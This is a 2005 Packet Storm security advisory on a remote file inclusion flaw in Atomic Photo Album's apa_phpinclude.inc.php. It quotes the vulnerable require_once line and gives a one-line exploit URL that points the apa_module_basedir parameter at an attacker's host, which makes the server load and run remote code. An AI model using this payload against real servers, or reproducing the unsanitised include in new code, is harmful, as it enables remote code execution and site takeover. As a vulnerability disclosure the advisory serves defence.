apa-include.txt

2005-07-28T00:00:00
ID PACKETSTORM:38898
Type packetstorm
Reporter pc_labs
Modified 2005-07-28T00:00:00

Description

                                        
                                            `Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :>   
------------------------------------------------------------  
  
Name: Atomic Photo Album (APA)  
Version: all  
  
  
Homepage: http://atomicpa.sourceforge.net/  
  
Author: pc_labs / lwdz - RandomHero   
Date: 20 July 2005  
------------------------------------------------------------  
------------------------------------------------------------  
  
Vulnerable code in : apa_phpinclude.inc.php  
  
require_once("apa_authadm.inc.php");  
else  
require_once("apa_auth.inc.php");  
....else{  
require_once("$apa_module_basedir/apa_config.inc.php");  
...  
  
}  
?>  
  
------------------------------------------------------------  
  
Exploit:  
  
  
http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/  
  
--------------------------------------------------------  
  
Fix and Vendor status:  
  
Vendor has been notified.  
  
------------------------------------------------------------  
  
Contact:  
  
Irc: irc.cl#pc_labs  
Author: pc_labs  
Location: Chile  
Email: gr0up.pclabs@gmail.com  
Greetz: AgReSsOr http://www.tbc-labz.net  
`